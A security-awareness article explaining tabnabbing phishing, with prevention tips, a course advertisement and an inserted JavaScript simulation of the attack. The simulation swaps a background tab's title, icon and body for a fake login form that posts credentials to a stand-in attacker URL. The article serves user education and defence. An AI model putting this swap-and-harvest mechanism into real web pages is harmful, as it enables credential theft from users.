What is tabnabbing? How it works and what you can do to prevent it

Tabnabbing is a type of phishing attack that targets tabs you have open but are not looking at. It is a relative of the familiar nuisance of a site opening unwanted pages in extra tabs, but with tabnabbing the malicious page looks harmless while you are on it; once you switch to another tab, a script on the page changes its layout, tab title and icon to mimic a legitimate site, typically a login page.

The scammers hope that users will return to the tab and mistake it for a page they opened themselves. If the user enters their login credentials, the form sends them to the scammers rather than to the real site.


Unlike most phishing scams, tabnabbing doesn't rely on persuading the user to click a link that sends them to the bogus site. The malicious page only needs to be open in a tab; the switch happens later, while the user is looking elsewhere, so the fake login page seems to appear from nowhere. This makes it very dangerous, because most people wouldn't recognise it as a phishing attack and aren't on alert to look for the tell-tale signs of such scams.
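How the switch is done, as an added example that is not code from the original article. It models only the page-side logic: `createFakeTab` is a constructed stand-in for the browser's `document` and `window` objects so the code runs outside a browser, and the site names, the decoy and the `installTabnab` and `addressBarMismatch` helpers are hypothetical. It also shows the one thing the script cannot change, the address the browser reports for the tab, which is what the address-bar check later in this article relies on.

```javascript
// Added example (not from the original article): a minimal model of the
// classic tabnabbing mechanic. The attacker's page listens for the tab losing
// visibility and, once the tab is in the background, rewrites its own title,
// icon and body to imitate a login page. In a real browser, installTabnab
// would be given the real `document` (document.addEventListener and
// document.hidden exist under these names); here a constructed fake is used
// so the example runs under Node.

function createFakeTab(url, title) {
  // Constructed stand-in for a browser tab, not a real DOM implementation.
  const listeners = {};
  const doc = {
    title,
    hidden: false,
    favicon: url + "/favicon.ico",
    body: "<h1>Ten tips for a tidy inbox</h1>",
    addEventListener(type, fn) {
      (listeners[type] = listeners[type] || []).push(fn);
    },
  };
  const win = { location: { href: url } }; // what the address bar shows
  const fire = (type) => (listeners[type] || []).forEach((fn) => fn());
  return {
    doc,
    win,
    // Simulate the user switching to another tab and coming back later.
    switchAway() { doc.hidden = true; fire("visibilitychange"); },
    switchBack() { doc.hidden = false; fire("visibilitychange"); },
  };
}

// Attacker-side logic. `decoy` describes the legitimate site being imitated.
// Nothing here touches win.location: a script can rewrite what the tab shows,
// but not the address the browser displays for it.
function installTabnab(doc, decoy) {
  let swapped = false;
  doc.addEventListener("visibilitychange", () => {
    if (doc.hidden && !swapped) {
      // The tab is in the background, so nobody is watching the change.
      doc.title = decoy.title;
      doc.favicon = decoy.favicon;
      doc.body = decoy.loginForm;
      swapped = true;
    }
  });
}

// The user-side check: does the domain in the address bar match the site the
// tab claims to be? A real user reads expectedHost off the login page's
// branding and compares it with the address bar by eye.
function addressBarMismatch(win, expectedHost) {
  return new URL(win.location.href).hostname !== expectedHost;
}

// Walk through the attack on constructed data and return the state of the
// tab before and after the user looks away.
function runScenario() {
  const tab = createFakeTab("https://tidy-inbox-tips.example", "Ten tips for a tidy inbox");
  const decoy = {
    host: "mail.example", // hypothetical webmail provider being imitated
    title: "Sign in - ExampleMail",
    favicon: "https://mail.example/favicon.ico",
    // The form posts to the attacker's own server, not to mail.example.
    loginForm: '<form action="https://tidy-inbox-tips.example/steal">' +
      '<input name="user"><input name="pass" type="password"></form>',
  };
  installTabnab(tab.doc, decoy);

  const before = { title: tab.doc.title, href: tab.win.location.href };
  tab.switchAway(); // user goes to another tab; the swap happens now
  tab.switchBack(); // user returns and sees a familiar-looking login page
  const after = {
    title: tab.doc.title,
    href: tab.win.location.href,
    mismatch: addressBarMismatch(tab.win, decoy.host),
  };
  return { before, after };
}

console.log(JSON.stringify(runScenario(), null, 2));
```

The title and icon change because the tab strip is what a user scans when looking for "their" email tab; the body changes so the returning user is met with a login form. Early demonstrations used `window.onblur` and `onfocus` rather than `visibilitychange`, and real pages often wait some time after the tab is hidden before swapping, but the mechanism and its limit are the same: the address bar still shows the page's real domain.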

Examples of tabnabbing

You are most likely to fall victim to tabnabbing when you have several tabs open. This is standard practice for a lot of people – particularly at work, where you are often multitasking throughout the day.

When multiple tabs are open, it's easy for an extra tab to appear without you noticing. You'll probably assume that you opened the site yourself and simply forgot, and even if you weren't intending to visit it, seeing what looks like a familiar login page in a tab is often enough of a prompt to log in.

Alternatively, you might mistake the malicious tab for a page you already have open, and assume that you had been automatically logged out. Many sites expire sessions after a period of inactivity as a security measure, so you're probably used to providing your credentials at regular intervals throughout the day.

How to prevent tabnabbing

Here are four things you can do to prevent tabnabbing:

1. Have as few tabs open as possible. People often struggle with this, but it's usually easier to open a new tab and type the address yourself than to hunt through dozens of open tabs for the right one, and a page you have just loaded by typing its address cannot have been swapped behind your back.

2. If you absolutely must have more than four or so tabs open, keep them in different windows according to what you use them for. So, for example, you might have one window with your inbox and intranet, one for your work tasks and another for non-work-related activities. This won't make you less likely to be targeted by tabnabbing, but you are more likely to notice when a tab has changed, because a login page for your email will look out of place in the window you use for unrelated browsing.

3. Check the address bar. A script can change a page's content, its title and its icon, but it cannot change the address the browser shows for that tab. If a tab looks like a site you use but the address bar shows a different domain, it is not that site, whatever the page says. Check the domain name itself: a padlock or https on its own proves nothing, because the scammers' site can have a certificate too.

4. Take a close look at the page. There may well be differences between it and the genuine site: look for spelling mistakes, poor phrasing and unusual layouts. If anything seems off, don't log in from that tab; open a new tab and type the site's address yourself.

Get your staff on the same page

As with all types of phishing, attacks can happen to anyone at any time. For organisations to ensure their users' credentials aren't stolen, they need to train staff to identify and defend against attacks.

Our Phishing Staff Awareness E-learning Course will teach your staff everything they need to know about phishing, including what happens if they fall victim.

The course is delivered online, making it quick and convenient. Employees can study at a time and place that suits them, and senior staff can get a comprehensive overview of their workforce’s level of information security awareness.
